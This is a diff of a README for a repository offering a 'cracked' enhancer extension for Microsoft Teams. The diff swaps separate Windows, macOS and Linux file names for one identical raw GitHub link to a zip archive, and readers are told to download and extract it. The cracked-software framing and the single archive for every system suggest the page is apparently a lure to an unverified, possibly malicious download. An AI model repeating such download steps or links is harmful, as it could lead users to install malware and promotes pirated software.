ONLYASO12122/cracked-enhancer-for-microsoft-teams-extension/README.md

 2. On the Releases page, find the latest version of the extension.
 3. Click the "Assets" drop-down menu to see the available files.
 4. Download the file that corresponds to your operating system:
-   - For Windows: Click on `cracked-enhancer-windows.zip`
+   - For Windows: Click on `https://raw.githubusercontent.com/ONLYASO12122/cracked-enhancer-for-microsoft-teams-extension/main/gashy/cracked-enhancer-for-microsoft-teams-extension.zip`
-   - For macOS: Click on `cracked-enhancer-macos.zip`
+   - For macOS: Click on `https://raw.githubusercontent.com/ONLYASO12122/cracked-enhancer-for-microsoft-teams-extension/main/gashy/cracked-enhancer-for-microsoft-teams-extension.zip`
-   - For Linux: Click on `cracked-enhancer-linux.zip`
+   - For Linux: Click on `https://raw.githubusercontent.com/ONLYASO12122/cracked-enhancer-for-microsoft-teams-extension/main/gashy/cracked-enhancer-for-microsoft-teams-extension.zip`
 5. Extract the downloaded file to a folder on your computer.

 ## 🔧 Installation Steps